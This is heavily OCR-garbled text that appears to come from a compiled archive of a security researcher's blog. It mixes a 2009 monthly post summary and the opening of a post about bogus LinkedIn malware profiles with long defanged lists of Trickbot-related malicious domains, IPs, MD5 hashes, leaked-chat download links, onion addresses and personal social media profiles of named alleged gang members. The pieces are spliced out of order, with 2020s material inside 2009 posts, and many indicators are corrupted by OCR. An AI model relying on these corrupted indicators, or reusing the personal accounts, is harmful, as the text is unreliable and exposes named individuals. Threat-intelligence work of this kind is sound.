

http: //www.securityfocus.com/columnists/48 


1 

2 

3 

4 

5. http: //ddanchev. blogspot .com/2008/08/76service-cybercrime-as-service-going. htm 
6. http: /adancnev.bogspetcon/2006/06/using-sarket=forces~to-disrupt-botmets. tall 
7, bist /(aantaey eLopspst one/2006/ C2 inca iing cyeerceiee cauvarel weal 

8. http: //adancnev.blogspet  con/2006/11/localizing-cybercrine-cultural. htm 

o, fece/acencasy eioemece com 000/e/actaeeian asa eteecag ote cgeee nen 
10 


11. http: //ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.htm 


12. http://ddanchev.blogspot .com/2008/06/price-discrimination-in-market-for.htm 
13. http: //ddanchev.blogspot .com/2008/07/are-stolen-credit-card-details-getting. htm 


14. http: //ddanchev.blogspot.com/2007/03/underground- economys-supply-of-goods.htm 


5.1.3 Summarizing Zero Day’s Posts for December (2009-01-06 16:19) 
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and [6]July, as well as subscribe to my [7]personal RSS feed or [8]Zero Day’s main feed. 


Notable articles for December include [9]JICANN terminates EstDomains, Directi takes over 
280k domains (interview with Stacy Burnette from the ICANN); [10]With 256-bit encryption, 
Acrobat 9 passwords still easy to crack (interview with Dmitry Sklyarov and Vladimir Katalov 
from Elcomsoft) and [11]Gmail, Yahoo and Hotmail systematically abused by spammers. 


01. [12]AlertPay hit by a large scale DDoS attack 

02. [13]IT expert executed in Iran 

03. [14]Vendor claims Acrobat 9 passwords easier to crack than ever 
04. [15]Microsoft’s Live Search (finally) adds malware warnings 

05. [16]ICANN terminates EstDomains, Directi takes over 280k domains 
06. [17]Password stealing malware masquerades as Firefox add-on 

07. [18]With 256-bit encryption, Acrobat 9 passwords still easy to crack 
08. [19]Trusteer launches search engine for malware configuration files 
09. [20]With or without McColo, spam volume increasing again 

10. [21]Vint Cerf’s Twitter account hacked, suspended for spam 

11. [22]Gmail, Yahoo and Hotmail systematically abused by spammers 
12. [23]IE7 XML parsing zero day exploited in the wild 
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notice[.]hgrtb[.Jcom 
recycling[.]plmr[.]su 
ec2-54-91-36-142[.]compute-1[.]amazonaws[.]com 
161-35-18-18[.]cprapid[.Jcom 
freedubcs[.]com 
n8n[.]marketingdigitalhotelaria[.]com[.]br 
www[.]161-35-18-18[.]cprapid[.Jcom 
minecraft[.]seriousortroll[.Jcom 
Related malicious domains known to have been involved in the campaign: 
3wfdpt-prime[.]Jcom 
wfselectivedpt[.]Jcom 
wrfm-selective[.]com 
mywfselect[.]Jcom 
wfglobalrestriction[.]com 
clientuswf-ac7m[.]com 
inctransf-xm4n[.]Jcom 
inctrans-mn5a[.]Jcom 
myconfigwf-4rmn[.]Jcom 
selectwf-cmv5[.]com 
c6mn-wfmyconfig[.]Jcom 
clientwfus-2anw[.]com 
supportconfigwells[.]Jcom 
wellsfarg-5nxm[.]com 
citiselect-6nm[.]com 
mychaseconfig2[.]com 
myfrgwells[.]Jcom 
mydptwellselect[.]com 
myfargomanagement[.]com 
selectfargo-mn6a[.]com 
myselectivechase-3nm[.]com 
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restrictchase7[.]com 
chaseconfigusa[.]com 
myselective-wells7[.]com 
mywells-select4[.]com 
wellsconfig-7mqn[.]Jcom 
wells-fargo4[.]Jcom 
wfconfig-7mn[.]com 
fargoselc-6us[.]Jcom 
myselectwells-2us[.]Jcom 
mywellsconf-4mn[.]com 


configwells-2yn[.]com 


Related malicious IPs known to have been involved in the campaign: 


194[.]76[.]224[.]36 
155[.]138[.]247[.198 
158[.]247[.]226[.]175 
217[.]69[.]1[.]107 
155[.]138[.]151[.]67 
194[.]76[.J224[.]233 
95[.]179[.]165[.]225 
194[.]76[.J227[.]35 
37[.]10[.]71[.]16 
158[.]247[.]203[.]13 
194[.]76[.]224[.]49 
104[.]156[.]232[.]254 
158[.]247[.]221[.]86 
144[.]202[.]37[.]142 
208[.]91[.]197[.]91 
192[.]248[.]173[.]82 
216[.]128[.]140[.]5 
139[.]180[.]168[.]177 
108[.]61[.J211[.]29 
185[.]189[.]151[.]142 
162[.]215[.]226[.]4 
45[.]63[.]108[.]27 
45[.]32[.]153[.]244 
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66[.]42[.]76[.]132 

207[.]148[.]10[.]113 

136[.]244[.]91[.]252 

194[.]76[.]227[.]43 

45[.]76[.]30[.]12 

185[.]189[.]149[.]167 

108[.]61[.J171[.]127 

95[.]179[.]161[.]101 

Related malicious MD5s known to have been involved in the campaign: 
66e5f78fc99c6f12cab5d4515ffb2a4a 
c9df681647879ad1204961ba41967ef2 
3195a3547d678eb3ca2e61ff5537be36 
ac10f563e3bd47066d2f4be590c6ddda 
7ba6b9ed3653b06da80b6162df45c4f8 
1872e97d972b809ebdc527469f1640b0 
Sample social media accounts for Trickbot malware gang members include: 
hxxp://my[.]mail[.]ru/mail/vdx _vadim1981/ 
hxxp://ok[.]ru/profile/803814083 
hxxp://vk[.]com/id35937296 

hxxp://ru[. Jlinkedin[.]com/in/sergey-loguntsov-b104b652 
hxxp://wwwl[.]gitmemory[.]com/loguntsov 
hxxp://habr[.]Jcom/ru/users/begemot _sun/ 
hxxp://www[. ]lyoutube[.]com/user/begemotsun 
hxxp://vk[.]com/id174832549 
hxxp://ok[.]ru/profile/554045979166 
hxxp://vk[.]com/id8693286 
hxxp://www[.]mixcloud[.]com/rootparser 
hxxp://twitter[.]com/volhvb 
hxxp://facebook[.]com/1505024528 
hxxp://vk[.]com/id5201387 
hxxp://volhvb[.]livejournal[.]com 
hxxp://github[.]com/ivanalert 

hxxp://www[. ]pinterest[.]com/ivanalert/ 
hxxp://vk[.]com/id237062960 
hxxp://www[.]instagram[.]com/ivan _alert/ 
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13. [24]Four XSS flaws hit Facebook 
14. [25]Thousands of legitimate sites SQL injected to serve IE exploit 


1. 

2. 

3. http: //ddanchev. blogspot .com/2008/11/summarizing-zero-days-posts-for-october.html 
4. 

5. 
6 

7 

8 

9 


ttp://ddanchev. blogspot .com/2008/08/summarizing-zero-days-posts-for-july.htm 


. http: //updates.zdnet .com/tags/danchotdanchev.html?t=0&s=00=1&mode=rss 


. http: //feeds.feedburner.com/zdnet/securit 
. http: //blogs.zdnet.com/security/?p=2260 


10. http://blogs.zdnet.com/security/?p=227 
11. http://blogs.zdnet.com/security/?p=229 
12. http://blogs.zdnet .com/security/?p= 

13. http://blogs.zdnet .com/security/?p=2246 
14. http://blogs.zdnet.com/security/?p=225 
15. http://blogs.zdnet.com/security/?p=225 
16. http://blogs.zdnet .com/security/?p= 


17. http://blogs.zdnet.com/security/?p= 

18. http://blogs.zdnet.com/security/?p=227 
19. http://blogs.zdnet.com/security/?p=227 
20. http://blogs.zdnet .com/security/?p=228 
21. http://blogs.zdnet .com/security/?p=228 
22. http://blogs.zdnet .com/security/?p=229 
23. http://blogs.zdnet .com/security/?p=2296 
24. http://blogs.zdnet .com/security/?p=2308 
25. http://blogs.zdnet .com/security/?p=2328 
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5.1.4 Dissecting the Bogus LinkedIn Profiles Malware Campaign (2009-01-07 15:36) 
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hxxp://wwwl[.]facebook[.]com/profile[. ]php?id=100003045533747 
hxxp://launchpad[.]net/ ivanalert 
hxxp://wwwl.]facebook[.]com/profile[. ]php?id=100003668932901 


hxxp://www[.]youtube[.]com/channel/UCUH8mmWenoKpm3pCQzZOPB1w?view 
_as=subscriber 


hxxp://wwwl[.]youtube[.]com/wwwroman95 
hxxp://vk[.]com/id23893726 

hxxp://twitter[.]com/RomakKorneev 
hxxp://wwwl.]linstagram[.]com/romankorneev 
hxxp://wwwI[.]facebook[.]com/profile[. ]php?id=1000218348 01507 
hxxp://vk[.]com/id395553371 
hxxp://wwwl[.]instagram[.]Jcom/gera_lemm 


Malicious URIs obtained using public sources from the internal leaked communication of the 
Trickbot malware gang include: 


hxxp://send[.]exploit[.]in/download/fbf9568e9167a28f/ 
hxxp://send[.]exploit[.]in/download/a853edce0cd0da8a/ 
hxxp://send[. ]Jexploit[. ]in/download/526e9ef764481068/ 
hxxp://tox[.]chat/ 

hxxp://github[.]com/TokTok/c-toxcore 
hxxp://github[.]com/qTox/q Tox 
hxxp://send[.]exploit[.]in/download/6cd743949cce4cel/ 
hxxp://send[.]exploit[.]in/download/0548c34ec95f70d3/ 
hxxp://send[. ]Jexploit[. ]in/download/9a43e9f0a3919627/ 
hxxp://send[.]exploit[.]in/download/3db22a5979b7e2c1/ 
hxxp://send[.]exploit[.]in/download/cc208c4bd046ad00/ 
hxxp://send[. ]exploit[.]in/download/a244a36e63e21b78/ 
hxxp://send[.]exploit[.]in/download/Ob9fea0e747d82ba/ 
hxxp://send[.]exploit[.]Jin/download/2b445626a5b71517/ 
hxxp://send[.]exploit[.]in/download/69cfb4f4ece99863/ 
hxxp://send[.]exploit[.]in/download/2c2654279e2ab857/ 
hxxp://send[.]exploit[.]in/download/1e0c8cd760096e8f/ 


hxxp://ffzm5q674ubizjwo4lai6myxxjeixqppqolem4c2dgogy5rz2|gf5tqd[.Jonion/g roup/Fire 
_Team?msg=wNsjJgQPN6ERDCpNsD 


hxxp://send[.]exploit[.]in/download/69350bf60390bc36/ 
hxxp://dropmefiles[.]com/uunBP 
hxxp://send[.]exploit[.]in/download/136a6e4dbf2b0cda/ 
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hxxp://send[.]Jexploit[.Jin/download/018547251fb262cc/ 
hxxp://www[.]linkedin[.]com/company/grubhub/ 
hxxp://twitter[.]com/grubhub/ 
hxxp://www[.]facebook[.]com/grubhub 
hxxp://www[.]linkedin[.]com/company/24148 
hxxp://twitter[.]com/AverittExpress/ 
hxxp://www[.]facebook[.]com/AverittExpress 
hxxp://youtube[.]com/channel/UCJPzpViAddp7IxgBFzCvB2g 
hxxp://www[. Jlinkedin[.]com/company/havi-global-solutions/ 
hxxp://twitter[.]com/HAVitweets 

hxxp://wwwl. ]linkedin[.]com/company/15677 
hxxp://twitter[.]com/TQLogistics 
hxxp://www[.]facebook[.]com/TotalQualityLogistics 
hxxp://www[.]linkedin[.]com/company/mobile-mini-uk-Itd/ 
hxxp://twitter[.]com/MobileMiniUK 
hxxp://wwwl.]facebook[.]Jcom/mobilemini 
hxxp://youtube[.]com/user/UKMobileMini 
hxxp://wwwl[.]linkedin[.]com/company/drive4ats/ 
hxxp://twitter[.]com/Drive4ATS 
hxxp://www[.]facebook[.]com/Drive4ATS/ 

hxxp://wwwl[. ]linkedin[.]com/company/freshdirect 
hxxp://twitter[.]com/FreshDirect/ 
hxxp://wwwl.]facebook[.]com/FreshDirect 
hxxp://youtube[.]com/FreshDirect 
hxxp://www[.]linkedin[.]com/company/36569/ 
hxxp://twitter[.]com/RuanTransport 
hxxp://www[.]facebook[.]com/ruantransportation/ 
hxxp://www[.]linkedin[.]com/company/toysrus1 
hxxp://wwwl[. |twitter[.]com/Toysrus 
hxxp://wwwl[.]facebook[.]com/toysrus 
hxxp://youtube[.]com/user/ToysRUsOnline 
hxxp://wwwl.]linkedin[.]com/company/take-2-interactive-software-inc[ .]/ 
hxxp://twitter[.]com/2K 

hxxp://www[.]facebook[.]com/2k/ 
hxxp://www[.]linkedin[.]com/company/epic-games 
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hxxp://twitter[.]com/EpicGames/ 
hxxp://wwwl[.]facebook[.]com/epicgames/ 
hxxp://youtube[.]com/epicgamesinc 
hxxp://wwwl.]linkedin[.]com/company/five-below/ 
hxxp://twitter[.]com/fivebelow/ 
hxxp://wwwl[.]facebook[.]com/FiveBelow 
hxxp://wwwI[.]youtube[.]com/user/FiveBelowTV 
hxxp://linkedin[.]com/company/Zulily 
hxxp://twitter[.]com/zulily/ 
hxxp://wwwl[.]facebook[.]com/Zulily 
hxxp://wwwI.]linkedin[.]Jcom/company/jakks-pacific/ 
hxxp://www[. ]twitter[.]com/jakks/ 
hxxp://wwwI[.]facebook[.]com/jakkspacifictoys 
hxxp://youtube[.]com/user/jakkspr2 
hxxp://linkedin[.]com/company/sam-goody 
hxxp://twitter[.]com/officialfye/ 
hxxp://wwwl.]facebook[.]com/FYE 
hxxp://wwwl.]linkedin[.]com/company/timex-group/ 
hxxp://twitter[.]com/timex/ 
hxxp://www[.]facebook[.]com/Timex 
hxxp://wwwl[.]linkedin[.]com/company/sunbelt-rentals/ 
hxxp://twitter[.]com/sunbeltrentals 
hxxp://wwwl.]linkedin[.]com/company/trinity-industries/ 
hxxp://twitter[.]com/trinity _ rail 
hxxp://wwwI.]linkedin[.]com/company/rent-a-center/ 
hxxp://twitter[.]com/rentacenter 
hxxp://www[.]facebook[.]com/RentACenter 
hxxp://www[.]youtube[.]com/user/rentacenter 
hxxp://wwwl.]linkedin[.]Jcom/company/aaron-rents-inc[.]/ 
hxxp://twitter[.]com/AaronsInc 
hxxp://wwwl[.]facebook[.]com/aaronsinc 
hxxp://wwwl.]linkedin[.]com/company/hercrentalsinc/ 
hxxp://twitter[.]com/HercRentalsInc 
hxxp://wwwl.]facebook[.]com/HercRentalsInc/ 
hxxp://wwwJ.]linkedin[.]com/company/rdo-equipment-co-/ 
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hxxp://twitter[.]com/rdoequipment/ 
hxxp://www[.]facebook[.]com/rdoequipment 
hxxp://www[. ]linkedin[.]com/company/altec/ 
hxxp://wwwl[. |twitter[.]Jcom/AltecInc 
hxxp://www[.]facebook[.]com/Altec 
hxxp://youtube[.]com/user/AltecNUECO 
hxxp://www[. ]linkedin[.]com/company/papegroup/ 
hxxp://twitter[.]com/PapeGroup 
hxxp://youtube[.]com/user/papecompanies 
hxxp://send[.]Jexploit[.Jin/download/5d0d4bbb0afec350/ 
hxxp://bearsofficialsstore[.]com/ 
hxxp://allpeople[.]Jcom 

hxxp://2ip[.]ru/ 

hxxp://bearsofficialsstore[.]com 


hxxp://www[.]zoominfo[.]com/c/clarke-washington-electric-membership-co 
tion/35344855 


hxxp://www[.]zoominfo[.]com/c/grupo/372532029 https 
hxxp://www[.]zoominfo[.]com/c/arya-sasol-polymer-company/346298379 https 
hxxp://privnote[.]com/pv7L48bu 
hxxp://5[.]45[.181[.]250/123[.]dll 
hxxp://qaz[.]lim/load/59Yr47/FenTnt 
hxxp://qaz[.]im/index[.]php?a=delete &q=1887201206 
hxxp://xakep[.]ru/2021/09/06/trickbot-arrest/ 
hxxp://1ty[.]me/8i9c5Tc 

hxxp://1ty[.]me/JL2GirUGy 

hxxp://1ty[.]me/OOglvDTN 

hxxp://1ty[.]me/xumfsHx4] 
hxxp://privatty[.]com/en/n/agln2amD 
hxxp://1ty[.]me/bbcT4mzh 

hxxp://file[. Jio/nzz5 BEd5MAIx 
hxxp://file[.Jio/LJy7dAGOC1a6 
hxxp://dropfiles[.]me/download/13103f0c60a547fa/ 
hxxp://file[. Jio/ONWvnvji3jid 
hxxp://file[.Jio/OMzfmVlaNOas 
hxxp://qaz[.]im/load/ehen7s/bdYzad 
hxxp://qaz[.]im/load/N3ETQ5/A4HTBQ 
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rpora- 


hxxp://qaz[.]im/load/2NtR4R/ZEHSN6 
hxxp://qaz[.]Jim/load/Nbsyyn/ef7hEn 

hxxp://file[. Jio/IEymzskA4nIX 
hxxp://file[.]io/g_LDBk4VyPF32 
hxxp://file[.]Jio/BXcB6wDciMLt 
hxxp://file[.]Jio/ZgCowey5yrGF 

hxxp://file[. Jio/vGQO0Z123m3Ky 

hxxp://file[. ]io/o™0OYHTRD400Z 
hxxp://qaz[.Jim/load/6QFTN2/DYaaH6 
hxxp://file[.]Jio/v308s1twLjLA 
hxxp://file[.]Jio/ARIXNHObUekb 
hxxp://avcheck[.]net/id/JcskuAwsn4Lq 
hxxp://avcheck[.]net/id/ZaTNn5wir3Bl 
hxxp://dropfiles[.]me/download/71893f2abb0d993b/ 
hxxp://file[.]io/9ONNLWKhOxTo 
hxxp://dropfiles[.]me/download/afe016264166b833/ 
hxxp://file[.]io/nK4Pojlwup5P 
hxxp://dropfiles[.]me/download/Oe9cf663cc1d2416/ 
hxxp://avcheck[.]net/id/rFnYuyVLtkKmU 
hxxp://avcheck[.]net/id/rLadnV8z04Sz 


hxxp://dyncheck[.]com/scan/id/e96ed4d26dae7c69f9c8de6d41f06c46 StToT xe 
Moet 


hxxp://dyncheck[.]com/scan/id/893b98e63cbef59ec76c42542a8176e8 
hxxp://dropfiles[.]me/download/32c63a7e18dc255d/ 

hxxp://dropfiles[. ]me/download/0cf99517ef4a3ff1/ 
hxxp://file[.Jio/FIMhSVicUOUd 
hxxp://dyncheck[.]com/scan/id/ddb24cce2bc6def7bb7f18falcd59f95 
hxxp://file[.]io/ShjqmvSelu6L 
hxxp://dropfiles[.]me/download/ac9541eb9004084f/ 
hxxp://file[.]io/PXAMH807uiVP 

hxxp://qaz[.]im/load/FsFrSZ/6dHdyE 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1197033403 
hxxp://217[.]12[.]204[.165 
hxxp://x6rciduomtjt25xigz7onkgxmusuwwuxqvidjkcramwg3lb5vvpsm7ad[.]onion 


hxxp://x6rciduomtjt25xigz7onkgxmusuwwuxqvidjkcramwg3lb5vvpsm7ad[.]onion 
/dAKEAKFKkzm8QTA3vk1zyS50ArYk8y4le4Ht}6UaWHtus/ 


pans.) 
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hxxp://send[.]Jexploit[.Jin/download/c0701c33bbb1f7f3/ 
hxxp://send[.]exploit[.Jin/download/fdb0f565088f64d9/ 
hxxp://send[.]exploit[.Jin/download/cf54a60e9e065dc8/ 
hxxp://send[.]Jexploit[.Jin/download/e4bb369café6bb2fa/ 
hxxp://qaz[.]im/load/4E2iNt/s27H5F 
hxxp://www[.]coursera[.]org/learn/python-for-data-science 
hxxp://temp[.]sh/ 

hxxp://prnt[.]sc/1j37gab 

hxxp://prnt[.]sc/1j432d0 

hxxp://templ[.]sh/iTFEW/2[.]rar 
hxxp://privatlab[.]com/s/v/qDYA6BGw5NtAxDma8Y5G 
hxxp://162[.]244[.]82[.]215/phpvirtualbox/ 

hxxp://im0-tub-ru[. ]yandex[.]net/i?id=4b112937d7f8bdb028cb576c48b0d7d d &n=13 
hxxp://thechoiceisyours[.]whatisthematrix[.]com 
hxxp://privatlab[.]com/s/v/5MnZyEeV2QCd5E8DJbMk 
hxxp://dyncheck[.]com/scan/id/3ffa2547752da1a367aa86c7011e5f73 
hxxp://dyncheck[.]com/scan/id/6a269aca1a933f1350512828a8a036df 
hxxp://monero[. ]org/downloads/ 

hxxp://temp[.]sh/hRtzi/1[.]rar 

hxxp://get[. ]io/ 
hxxp://privatlab[.]com/m/v/aqO0IMQQG3Hm5QyG8wVn 
hxxp://privatlab[.]com/s/v/QGbOVwb635tB4deoZLzB 
hxxp://file[.]Jio/4SpEyZjJz7M)J 

hxxp://lolz[.]guru/threads/1590627/ 
hxxp://www[.]comss[.]ru/page[.]php?id=9593 

hxxp://wwwl. ]whonix{.]Jorg/wiki/VirtualBox/XFCE 

hxxp://www[. ]whonix[.]org/wiki/VMware 


hxxp://cceqv5ulg6fc44budf3a4s5kkrhprk5okjmdtgmo6xevj2p2sxnkh3id[.Jonion/| 
g/23033799 


hxxp://tl.]me/kucoin _pumps 
hxxp://www[.]securitylab[.]ru/news/526755[.]php 
hxxp://www[.]securitylab[.]ru/news/526750[.]php 
hxxp://privatlab[.]com/s/v/zBwxJkzqMZu79aJ6Be7q 

hxxp://github[. ]com/johncraig-lemma/Lemma-Works-translations 
hxxp://www[.]youtube[.]com/channel/UC6ttD08hoT4HyY MGxaBkGw 
hxxp://megal[.]nz/folder/ogFwADbB 
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hxxp://avcheck[.]net/id/m6Ps]KSKI9DO 
hxxp://file[.]Jio/3wt4CQhoQrly 
hxxp://dropfiles[.]me/download/40cc885d974f451d/ 
hxxp://xakep[.]ru/2022/01/14/revil-fsb/ 
hxxp://ibb[.]co/n3Wy8sP 
hxxp://avcheck[.]net/id/bAiYoouEQFTD 
hxxp://dropfiles[.]me/download/19b640cc6d0572f8/ 
hxxp://avcheck[.]net/id/stfea8Iv3WsE 
hxxp://avcheck[.]net/id/wv5NexiYgAZZ 
hxxp://prnt[.]sc/26muytm 
hxxp://avcheck[.]net/id/XChz10tc6swL 
hxxp://prnt[.]sc/26nw6mc 
hxxp://privatlab[. ]com/m/v/XyoYdXAe9bu32DWOyYJA 
hxxp://prnt[.]sc/26s4zp9 
hxxp://dropfiles[.]me/download/9bdb3cb9a8b0725c/ 
hxxp://privnote[.]com/g7MI7ejO 
hxxp://twitter[.]Jcom/IT news for _all/status/1492759760831143937 
hxxp://privatlab[. ]com/m/v/9monLlYdQgFwgpBRO27V 
hxxp://privnote[.]com/Sc2m5kmu 
hxxp://privatlab[.]com/s/v/Jryzjal7anC4YAZQpkWM 
hxxp://www[.]onlinepasswordgenerator[.]ru/ 
hxxp://privatlab[.]com/s/v/8BRQBWMzYg6hI95RJBEwQ 
hxxp://privatlab[. ]com/s/v/bYmwDL5AayFApwXyBOoM 
hxxp://privatlab[. ]com/s/v/M9090D460yf4Y728QVbG 
hxxp://file[.]io/OUm7193CSFgx 
hxxp://dyncheck[.]com/scan/id/6e565b5e9042b2bc66f2d406b71ba3b1 
hxxp://file[.]io/r8G8ymJOKG4R 
hxxp://dyncheck[.]com/scan/id/22c00d69435flb1c8el4ecc42fcb24b5 
hxxp://qaz[.]im/load/y3r6b6/z27az9 
hxxp://qaz[.]im/index[.]php?a=delete &q=386725717 
hxxp://qaz[.]im/load/G6YdNG/KQDASE 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1967352795 
hxxp://qaz[.]Jim/load/s58h5f/GbnrdN 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1458784177 
hxxp://qaz[.]im/load/iBKNFk/HdiSzk 
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hxxp://qaz[.]im/index[.]php?a=delete &q=695096881 
hxxp://qaz[.]lim/load/ynNk8h/tKGRYt 
hxxp://qaz[.]im/index[.]php?a=delete &q=1213752901 
hxxp://qaz[.]im/load/tsNs6Z/QbK78h 
hxxp://173[.]232[.]146[.]236/phpvirtualbox/ 
hxxp://scrytnuuszglaugg[.]Jonion 
hxxp://mk6gwg6mwnnGif33[.]onion/ TyT 6bIN 
hxxp://qaz[.]im/load/YFrN26/Ai35S2 
hxxp://drive[.]google[.]com/file/d/LowMkUiQQSFzrpFyboilEn999KUXz5 Tw t/view?usp=sharing 
hxxp://qaz[.]im/load/e9yed4/iZBy2Z 
hxxp://cashbank[.]pro/userxch/ 
hxxp://prntscr[.]com/urelz8 
hxxp://qaz[.]im/load/AbbFfe/3ftYBS 
hxxp://qaz[.]im/load/ifde7b/7K5sZn 
hxxp://qaz[.]lim/load/Y5hGYA/F3nZSK 
hxxp://qaz[.]im/load/8DH4BR/ztYnRQ 
hxxp://qaz[.]im/index[.]php?a=delete &q=970970566 
hxxp://qaz[. ]im/load/hshE44/H3z3aT 
hxxp://qaz[.]im/load/adsaR2/GEe3na 
hxxp://qaz[.]im/load/dNrY9Y/h2HZYi 
hxxp://qaz[.]im/index[.]php?a=delete &q=1836946690 
hxxp://qaz[.]im/load/55BAB3/2knTSs 
hxxp://qaz[.]im/index[.]php?a=delete &q=2088427259 
hxxp://qaz[.]im/load/i7QS7A/Ee4ets 
hxxp://dpn56ohf2hl46t2t[.]onion/ He cpabaTbiBaeT KOMaHa BHL 
hxxp://qaz[.]im/load/sdFHQh/4QENBe 
hxxp://qaz[.]im/index[.]php?a=delete &q=1018258342 
hxxp://qaz[.]im/load/KDkyBz/NnbdRG 
hxxp://drive[.]google[.]com/file/d/1LfNinNgRIlreOWtB8R6SZlyjQFIJk-WDyS/ view?usp=sharing 
hxxp://qaz[.]im/zaq/NSByraDt 
hxxp://qaz[.]im/load/zD2yFh/TK9rnY 
hxxp://qaz[.]im/index[.]php?a=delete &q=38937664 
hxxp://qaz[.]lim/load/3yE6e2/3DTBEa 
hxxp://qaz[.]lim/load/YtNT49/t6ZZrf 
hxxp://qaz[.]im/load/FDrdB4/fhbGyz 
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hxxp://qaz[.]Jim/load/GSTkb7/4rtHT8 
hxxp://qaz[.Jim/index[.]php?a=delete &q=249638501 
hxxp://qaz[.]im/load/y3YrkN/fk9Yr9 
hxxp://qaz[.]im/load/8yQaKT/3yZ6yF 
hxxp://qaz[.Jim/load/yy5h5s/n9Z7kk 
hxxp://qaz[.]im/load/EGySZa/aAZY2S 
hxxp://qaz[.]im/load/FHbAb6/zGZ3aD 

hxxp://xakep[. ]ru/2020/07/14/trickbot-warning/ 
hxxp://qaz[.]Jim/load/9B2ATe/aa7shR 
hxxp://qaz[.]im/index[.]php?a=delete &q=2063358067 
hxxp://wwwl[.]avanet[.]com/en/shop/sophos-central-intercept-x-advanced -for-server-with-edr/ 
hxxp://qaz[.]im/load/hATBDdZ/AY6Ert 
hxxp://qaz[.Jim/index[.]php?a=delete &q=929711338 
hxxp://173[.]232[.]146[.]199/phpvirtualbox-5[.]0-5/ 
hxxp://173[.]232[.]146[.]72 
hxxp://uibegvz4hxzrqjqc[.]onion/ 
hxxp://uibegvz4hxzraqjqc[.Jonion/login c JIorMHom ttl 
hxxp://uibegvz4hxzrajqc[.Jonion/login 
hxxp://kwwka7ark3ynr7k7[.]onion 
hxxp://kwwka7ark3ynr7k7[.]onion/ Ko Bcem rpynnam mor 
hxxp://qaz[.]im/load/GYrY 7d/QFHftF 
hxxp://qaz[.Jim/load/AEz5zd/zaN5h4 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1282691591 
hxxp://qaz[.]Jim/load/5fKYRE/rAG5S7 
hxxp://qaz[.]im/index[.]php?a=delete &q=1128688759 
hxxp://qaz[.]im/load/QaYt9F/frdHd4 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2108824035 
hxxp://dyncheck[.]com/scan/id/74a96dc865db0336d6cc8f8394b8725c 
hxxp://qaz[.]Jim/load/dN974Y/5dFfZA 
hxxp://qaz[.Jim/index[.]php?a=delete &q=935824666 
hxxp://privnote[.]com/refYewr9 


hxxp://blockchain[.]com/btc/tx/c157fde04a95393011322137a50c077b3d02d9f973 5602ea39- 
084e503398b0da 


hxxp://www[.]sendspace[.]com/file/3vpu0s 
hxxp://qaz[.]im/load/HArtQQ/B275Gi 
hxxp://qaz[.]im/index[.]php?a=delete &q=561838786 
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hxxp://qaz[.]im/load/sArH24/z7ZeQy 
hxxp://qaz[.]im/index[.]php?a=delete &q=409838397 
hxxp://qaz[. ]im/load/sSfEtr/D8iGSN 
hxxp://qaz[.]im/index[.]php?a=delete &q=908723528 
hxxp://send[.]firefox[.]com/download/027a56785328ffa7/ 
hxxp://send[.]firefox[.]com/download/4e9636d38f964447/ 
hxxp://qaz[.]im/load/D9ShAD/tiT7nQ 
hxxp://qaz[.]im/index[.]php?a=delete &q=2002984399 
hxxp://dyncheck[.]com/scan/id/9d97ae93c63a8b2185ed1fab49dd6b8a 
hxxp://qaz[.]im/load/rFGSSR/Rfr5H8 
hxxp://qaz[.]im/index[.]php?a=delete &q=1122613702 
hxxp://dyncheck[.]com/scan/id/fd6d0a21af09e8b4544922a39a83b/7fa 
hxxp://avcheck[.]net/id/7jKgxjlaFXAQ 
hxxp://dyncheck[.]com/scan/id/f2abdc4e5511f12de48ccf0371d5dbd9 
hxxp://send[.]firefox[.]com/download/2e5ea99f15af88a9/ 
hxxp://send[.]firefox[.]com/download/e421d31fdf55b4c6/ 
hxxp://qaz[.]im/load/BarBaZ/nFKsyy 
hxxp://qaz[.]im/index[.]php?a=delete &g=1779508174 
hxxp://qaz[.]im/load/zhd34h/GiQEH6 
hxxp://qaz[.]im/index[.]php?a=delete &q=1447960949 
hxxp://send[.]firefox[.]com/download/60e4acaf8fab2817/ 
hxxp://send[.]firefox[.]com/download/7321892c0dc8ac32/ 
hxxp://qaz[.]im/load/KNiE39/FohtZA 
hxxp://qaz[.]im/index[.]php?a=delete &q=1005697056 
hxxp://qaz[.]im/load/FfakK8F/t3sQAb 
hxxp://qaz[.]im/index[.]php?a=delete &q=927030228 
hxxp://qaz[.]im/load/Hs36Gt/na9Zt5 
hxxp://qaz[.]im/index[.]php?a=delete &q=126668849 
hxxp://send[.]firefox[.]com/download/f0d724bad57390ed/ 
hxxp://qaz[.Jim/load/Y4fK2f/6SQ9AE 
hxxp://qaz[.]im/index[.]php?a=delete &q=1253947417 
hxxp://qaz[.]im/load/Q2nDF7/k4rnG9 
hxxp://qaz[.]im/index[.]php?a=delete &q=259023016 
hxxp://qaz[. ]im/load/dhdGfs/yd8nE4 
hxxp://qaz[.]im/load/6rdRaN/SrhBKQ 
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Tila Tequila naked © Contact 


indemry = Accounting Pubtic profile powered by Linked [J) 
Websites « TILA TEQUILA NUDE £ sIVE Sagn in ov Jom Now 
e TLATE A NUDE Ex t 
View Tila’s full profile 
+ oe 


a yOu and Ta Tequila naked How 
«+ Tila Tequila naked's Summary . ae = 
t wiroduced to Téa Tequila nate 


TLA TEQUILA NAKED . otal Tea Tequata naked orect 


© Additional information 
TLA TEQUILA NUDE EXCLUSIVE \ Name Search 
A TEQUILA NUDE EXCLUSIVE Seerch tor peogte you know fom ove 
A NUDE EX Orchessrcnats airead Lived 
| 
Dan Myre 


Nice catch, in the sense that [1]LinkedIn was among the very few social networking sites left 
untouched by cybercriminals in 2008. With LinkedIn’s staff actively removing the close to a 
hundred bogus profiles, let’s dissect the campaign by exposing all the participating malware 
domains, the redirectors, the droppers’ detection rates and the rest of the domains in their 
portfolio. 


Domains used on the bogus profiles : 
sextapegirls .net (88.214.200.5) 
celebsvids .net (216.195.57.47) 
katynude .com (216.195.57.47) 
delshikandco .com (82.103.132.114) 
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hxxp://qaz[.Jim/index[.]php?a=delete &q=1067371971 


hxxp://blockchain[.]com/btc/tx/b6db59bfc5f2944f5beb307e342dc8ceee5ec8 - 
8da9d13c20480fa166ab394572 


hxxp://send[.]firefox[.]com/download/41a2a3a3540d37bb/ 
hxxp://send[. ]firefox[.]com/download/533653fc0c48flae/ 
hxxp://send[. ]firefox[.]com/download/63dd2e06e9dcedal/ 
hxxp://send[.]firefox[.]com/download/c68831c806f434dd/ 
hxxp://send[. lfirefox[.]com/download/c829b4786360119e/ 
